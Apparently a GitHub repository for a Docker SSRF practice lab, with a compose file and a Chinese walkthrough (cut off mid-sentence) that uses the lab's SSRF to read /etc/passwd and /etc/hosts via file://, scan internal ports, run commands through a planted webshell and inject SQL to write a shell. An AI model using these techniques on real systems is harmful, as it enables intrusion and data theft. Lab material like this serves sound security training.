├── 图片 ├── 161596409182.png ├── 1615964526544.png ├── 1620373632443.png ├── 1620379158609.png ├── 16158845554080.png ├── 16158846948365.png ├── 16158848092235.png ├── 16158852051819.png ├── 16158853012234.png ├── 16158992187949.png ├── 16158995732548.png ├── 16158999618923.png ├── 16159022268572.png ├── 16159434785930.png ├── 16159444802587.png ├── 16159446329950.png ├── 16159447676123.png ├── 16159471386687.png ├── 16159472149209.png ├── 16159482716992.png ├── 16159486112615.png ├── 16159487947826.png ├── 16159488236844.png ├── 16159507356928.png ├── 16159507909051.png ├── 16159508482777.png ├── 16159509711131.png ├── 16159511969112.png ├── 16159512533721.png ├── 16159595617894.png ├── 16159601558925.png ├── 16159620724415.png ├── 16159622165771.png ├── 16159623108967.png ├── 16159641814811.png ├── 16159645952337.png ├── 16159647944294.png ├── 16159678892175.png ├── 16159680654495.png ├── 16159683314157.png ├── 16159716703465.png ├── 16203786039801.png ├── 16203790367605.png ├── 16203793021008.png ├── 16203795678307.png ├── 16203796537306.png ├── 16203835195059.png ├── 16203839384264.png ├── 16203841323189.png ├── 16203841954734.png ├── 16204652496250.png ├── 16204668042945.png ├── 16204671626680.png ├── 16204672777528.png ├── 16204676811766.png ├── 16204679134706.png ├── 16204695776705.png ├── 16204695857520.png ├── 16204701072416.png ├── 16204703947056.png ├── 16205694239190.png ├── 16205718285870.png ├── 16205798556776.png ├── image-20210621151143989.png └── image-20210621151258879.png ├── README.md ├── docker-compose.yml ├── LICENSE └── 国光老师ssrf靶场通过手册.md /图片/161596409182.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/161596409182.png -------------------------------------------------------------------------------- /图片/1615964526544.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/1615964526544.png -------------------------------------------------------------------------------- /图片/1620373632443.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/1620373632443.png -------------------------------------------------------------------------------- /图片/1620379158609.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/1620379158609.png -------------------------------------------------------------------------------- /图片/16158845554080.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16158845554080.png -------------------------------------------------------------------------------- /图片/16158846948365.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16158846948365.png -------------------------------------------------------------------------------- /图片/16158848092235.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16158848092235.png -------------------------------------------------------------------------------- /图片/16158852051819.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16158852051819.png -------------------------------------------------------------------------------- /图片/16158853012234.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16158853012234.png -------------------------------------------------------------------------------- /图片/16158992187949.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16158992187949.png -------------------------------------------------------------------------------- /图片/16158995732548.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16158995732548.png -------------------------------------------------------------------------------- /图片/16158999618923.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16158999618923.png -------------------------------------------------------------------------------- /图片/16159022268572.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159022268572.png -------------------------------------------------------------------------------- /图片/16159434785930.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159434785930.png -------------------------------------------------------------------------------- /图片/16159444802587.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159444802587.png -------------------------------------------------------------------------------- /图片/16159446329950.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159446329950.png -------------------------------------------------------------------------------- /图片/16159447676123.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159447676123.png -------------------------------------------------------------------------------- /图片/16159471386687.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159471386687.png -------------------------------------------------------------------------------- /图片/16159472149209.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159472149209.png -------------------------------------------------------------------------------- /图片/16159482716992.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159482716992.png -------------------------------------------------------------------------------- /图片/16159486112615.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159486112615.png -------------------------------------------------------------------------------- /图片/16159487947826.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159487947826.png -------------------------------------------------------------------------------- /图片/16159488236844.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159488236844.png -------------------------------------------------------------------------------- /图片/16159507356928.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159507356928.png -------------------------------------------------------------------------------- /图片/16159507909051.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159507909051.png -------------------------------------------------------------------------------- /图片/16159508482777.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159508482777.png -------------------------------------------------------------------------------- /图片/16159509711131.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159509711131.png -------------------------------------------------------------------------------- /图片/16159511969112.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159511969112.png -------------------------------------------------------------------------------- /图片/16159512533721.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159512533721.png -------------------------------------------------------------------------------- /图片/16159595617894.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159595617894.png -------------------------------------------------------------------------------- /图片/16159601558925.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159601558925.png -------------------------------------------------------------------------------- /图片/16159620724415.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159620724415.png -------------------------------------------------------------------------------- /图片/16159622165771.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159622165771.png -------------------------------------------------------------------------------- /图片/16159623108967.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159623108967.png -------------------------------------------------------------------------------- /图片/16159641814811.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159641814811.png -------------------------------------------------------------------------------- /图片/16159645952337.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159645952337.png -------------------------------------------------------------------------------- /图片/16159647944294.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159647944294.png -------------------------------------------------------------------------------- /图片/16159678892175.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159678892175.png -------------------------------------------------------------------------------- /图片/16159680654495.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159680654495.png -------------------------------------------------------------------------------- /图片/16159683314157.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159683314157.png -------------------------------------------------------------------------------- /图片/16159716703465.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16159716703465.png -------------------------------------------------------------------------------- /图片/16203786039801.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16203786039801.png -------------------------------------------------------------------------------- /图片/16203790367605.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16203790367605.png -------------------------------------------------------------------------------- /图片/16203793021008.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16203793021008.png -------------------------------------------------------------------------------- /图片/16203795678307.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16203795678307.png -------------------------------------------------------------------------------- /图片/16203796537306.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16203796537306.png -------------------------------------------------------------------------------- /图片/16203835195059.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16203835195059.png -------------------------------------------------------------------------------- /图片/16203839384264.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16203839384264.png -------------------------------------------------------------------------------- /图片/16203841323189.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16203841323189.png -------------------------------------------------------------------------------- /图片/16203841954734.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16203841954734.png -------------------------------------------------------------------------------- /图片/16204652496250.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16204652496250.png -------------------------------------------------------------------------------- /图片/16204668042945.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16204668042945.png -------------------------------------------------------------------------------- /图片/16204671626680.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16204671626680.png -------------------------------------------------------------------------------- /图片/16204672777528.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16204672777528.png -------------------------------------------------------------------------------- /图片/16204676811766.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16204676811766.png -------------------------------------------------------------------------------- /图片/16204679134706.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16204679134706.png -------------------------------------------------------------------------------- /图片/16204695776705.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16204695776705.png -------------------------------------------------------------------------------- /图片/16204695857520.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16204695857520.png -------------------------------------------------------------------------------- /图片/16204701072416.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16204701072416.png -------------------------------------------------------------------------------- /图片/16204703947056.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16204703947056.png -------------------------------------------------------------------------------- /图片/16205694239190.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16205694239190.png -------------------------------------------------------------------------------- /图片/16205718285870.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16205718285870.png -------------------------------------------------------------------------------- /图片/16205798556776.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/16205798556776.png -------------------------------------------------------------------------------- /图片/image-20210621151143989.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/image-20210621151143989.png -------------------------------------------------------------------------------- /图片/image-20210621151258879.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/图片/image-20210621151258879.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ssrf_vul 2 | 国光师傅的SSRF靶场docker环境 3 | 4 | # 启动环境 5 | 6 | ``` 7 | docker-compose up -d 8 | ``` 9 | 10 | ![image-20210621151143989](图片/image-20210621151143989.png) 11 | 12 | 访问漏洞环境 13 | 14 | ![image-20210621151258879](图片/image-20210621151258879.png) 15 | 16 | # 参考文献 17 | 18 | - [Github:sqlsec/ssrf-vuls](https://github.com/sqlsec/ssrf-vuls) 19 | - [Github:LS95/gopher-redis-aut](https://github.com/LS95/gopher-redis-auth) 20 | 21 | -------------------------------------------------------------------------------- /docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | 3 | networks: 4 | ssrf_v: 5 | ipam: 6 | config: 7 | - subnet: 172.72.23.0/16 8 | gateway: 172.72.23.1 9 | 10 | services: 11 | ssrfweb1: 12 | image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v1 13 | ports: 14 | - 8080:80 15 | networks: 16 | ssrf_v: 17 | ipv4_address: 172.72.23.21 18 | 19 | ssrfweb2: 20 | image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v2 21 | networks: 22 | ssrf_v: 23 | ipv4_address: 172.72.23.22 24 | 25 | ssrfweb3: 26 | image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v3 27 | networks: 28 | ssrf_v: 29 | ipv4_address: 172.72.23.23 30 | 31 | ssrfweb4: 32 | image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v4 33 | networks: 34 | ssrf_v: 35 | ipv4_address: 172.72.23.24 36 | 37 | ssrfweb5: 38 | image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v5 39 | networks: 40 | ssrf_v: 41 | ipv4_address: 172.72.23.25 42 | 43 | ssrfweb6: 44 | image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v6 45 | networks: 46 | ssrf_v: 47 | ipv4_address: 172.72.23.26 48 | 49 | ssrfweb7: 50 | image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v7 51 | networks: 52 | ssrf_v: 53 | ipv4_address: 172.72.23.27 54 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /国光老师ssrf靶场通过手册.md: -------------------------------------------------------------------------------- 1 | [TOC] 2 | 3 | 4 | 5 | # SSRF 打穿内网 6 | 7 | # 靶场拓扑设计 8 | 9 | ![img](图片/16205694239190.png) 10 | 先理清一下攻击流程,172.72.23.21 这个服务器的 Web 80 端口存在 SSRF 漏洞,并且 80 端口映射到了公网的 8080,此时攻击者通过这个 8080 端口可以借助 SSRF 漏洞发起对 172 目标内网的探测和攻击。 11 | 12 | # x.x.x.x:8080 - 判断 SSRF 是否存在 13 | 14 | 能够对外发起网络请求的地方,就可能存在 SSRF。首先看下目标站点的功能,获取站点快照: 15 | 16 | ![img](图片/16158845554080.png) 17 | 18 | 先尝试获取外网 URL 试试看,测试一下经典的 百度 robots.txt: 19 | 20 | ![img](图片/16158846948365.png) 21 | 22 | 测试成功,网站请求了 Baidu 的 robots.txt 文件了,并将请求页面的内容回显到了网站前端中。那么接下来尝试获取内网 URL 看看,测试请求 127.0.0.1 看看会有什么反应: 23 | 24 | ![img](图片/16158848092235.png) 25 | 26 | 测试依然成功,网站请求了 127.0.0.1 的 80 端口 ,也就是此可我们浏览的界面,所以我们就看到了图片上的“套娃”现象。 通过以上两次请求,已经基本上可以确定这个输入框就是传说中的 SSRF 的漏洞点了,即没有对用户的输入进行过滤,导致可以用来发起任意的内网或者外网的请求。 27 | 28 | # 172.72.23.21 - SSRF 获取本地信息 29 | 30 | ## FILE 协议获取本地信息 31 | 32 | 既然当前站点存在 SSRF 的话,我们可以尝试配合 file 协议来读取本地的文件信息,首先尝试使用 file 协议来读取 /etc/passwd 文件试试看: 33 | 34 | ``` 35 | file:///etc/passwd 36 | ``` 37 | 38 | ![img](图片/16158852051819.png) 39 | 40 | 成功读取到了本地的文件信息,现在尝试来获取存在 SSRF 漏洞的本机内网 IP 地址信息,确认当前资产的网段信息: 41 | 42 | ``` 43 | file:///etc/hosts 44 | ``` 45 | 46 | ![img](图片/16158853012234.png) 47 | 48 | 可以判断当前机器的内网地址为 **172.23.23.21**,那么接下来就可以对这个内网资产段进行信息收集了。 49 | 50 | > 权限高的情况下还可以尝试读取 `/proc/net/arp` 或者 `/etc/network/interfaces` 来判断当前机器的网络情况 51 | 52 | # 172.72.23.1/24 - SSRF 探测内网端口 53 | 54 | SSRF 常配合 DICT 协议探测内网端口开放情况,但不是所有的端口都可以被探测,一般只能探测出一些带 TCP 回显的端口,BP 下使用迭代器模式爆破,设置好要爆破的 IP 和 端口即可批量探测出端口开放的信息: 55 | 56 | 57 | 58 | ![img](图片/16205718285870.png) 59 | 60 | 通过爆破可以轻易地整理出端口的开放情况: 61 | 62 | ```none 63 | 172.72.23.21 - 80 64 | 172.72.23.22 - 80 65 | 172.72.23.23 - 80、3306 66 | 172.72.23.24 - 80 67 | 172.72.23.25 - 80 68 | 172.72.23.26 - 8080 69 | 172.72.23.27 - 6379 70 | 172.72.23.28 - 6379 71 | 172.72.23.29 - 3306 72 | ``` 73 | 74 | 对照下拓扑图,端口开放信息都是一一匹配的,信息收集完毕,那么接下来就开始只使用最外部的 SSRF 来打穿内网吧。 75 | 76 | 除了使用 DICT 协议探测端口以外,还可以使用正常的 HTTP 协议获取到内网中 Web 应用的信息情况,这里就不再赘述了。 77 | 78 | # 172.72.23.22 - 代码注入 79 | 80 | ## 代码注入应用详情 81 | 82 | 本版块属于上帝视角,主要作用是给读者朋友们展示一下应用本身正常的功能点情况,这样后面直接使用 SSRF 来攻击的话,思路就会更加清晰明了。 83 | 84 | - **index.php** 85 | 86 | 一个正常的提示页面,啥都没有: 87 | 88 | ![img](图片/16159507909051.png) 89 | 90 | - **phpinfo.php** 91 | 92 | 凑数勉强算是一个敏感文件吧: 93 | 94 | 95 | 96 | ![img](图片/16159507356928.png) 97 | 98 | 99 | 100 | - **shell.php** 101 | 102 | 一个经典的 system 一句话木马: 103 | 104 | ![img](图片/16159508482777.png) 105 | 106 | ## SSRF 之目录扫描 107 | 108 | 如果想要利用 SSRF 漏洞对内网 Web 资产进行目录扫描的话,使用传统的 dirsearch 等工具就不是很方便了,这种场景下使用的是 Burpsuite 抓包,然后导入字典批量遍历路径参数,请求包如下: 109 | 110 | ![img](图片/16158992187949.png) 111 | 112 | 使用 Burpsuite 自带的 Grep - Extract 可以快速地筛选页面正则匹配的结果,很明显这个 172.72.23.22 的内网站点下面还存在着 phpinfo.php 和 shell.php: 113 | 114 | ![img](图片/16158995732548.png) 115 | 116 | ## SSRF 之代码注入 117 | 118 | 因为这个一句话 webshell 使用了 GET 来接受请求,所以可以直接使用 SSRF 的 HTTP 协议来发起 GET 请求,直接给 cmd 参数传入命令值,导致命令直接执行: 119 | 120 | ![img](图片/16159444802587.png) 121 | 122 | 使用浏览器提交请求的话,空格得写成`%20`才可以顺利执行命令 : 123 | 124 | ![img](图片/16158999618923.png) 125 | 126 | 从 hosts 文件的结果可以看出,当前我们已经拿下了内网 172.72.23.22 这台机器的权限了。 127 | 128 | 如果从 BP 里面抓包请求的话,空格得写成`%2520`,即两次 URL 编码才可以顺利执行命令: 129 | 130 | 131 | 132 | ![img](图片/16159022268572.png) 133 | 134 | # 172.72.23.23 - SQL 注入 135 | 136 | ## SQL 注入应用详情 137 | 138 | 本版块属于上帝视角,主要作用是给读者朋友们展示一下应用本身正常的功能点情况,这样后面直接使用 SSRF 来攻击的话,思路就会更加清晰明了。 139 | 140 | 基础的联合查询注入,可以直接带出数据库的相关信息: 141 | 142 | ![img](图片/16159446329950.png) 143 | 144 | ![img](图片/16159509711131.png) 145 | 146 | 同时也预设了一个 flag,同样通过联合查询也可以简单的查询出 flag 的值: 147 | 148 | ![img](图片/16159447676123.png) 149 | 150 | ![img](图片/16159434785930.png) 151 | 152 | 因为管理员(国光)不小心(故意)给网站目录设置了 777 权限,所以这里可以尝试通过 MySQL 的 `INTO DUMPFILE` 直接往网站的目录下写 shell,最终借助 SQL 注入的 UNION 注入来执行写shell 的 SQL 语句 payload 如下: 153 | 154 | ![img](图片/16159511969112.png) 155 | 156 | 成功写 shell 后,浏览器直接访问执行命令看看: 157 | 158 | ![img](图片/16159512533721.png) 159 | 160 | ## SSRF 之 SQL 注入 161 | 162 | 利用 SSRF 来注入内网中存在 SQLI 的资产的话,和上一个小节的 GET 型注入差不多,只要注意一些编码细节即可。 163 | 164 | SSRF 之基础的联合查询注入,可以直接带出数据库的相关信息,和正常注入差不多,只需要将空格进行**两次 URL 编码**即可: 165 | 166 | ![img](图片/16159471386687.png) 167 | 168 | ![img](图片/16159472149209.png) 169 | 170 | 同理直接注入出数据库中的 flag: 171 | 172 | ![img](图片/16159482716992.png) 173 | 174 | 往网站的目录写通过 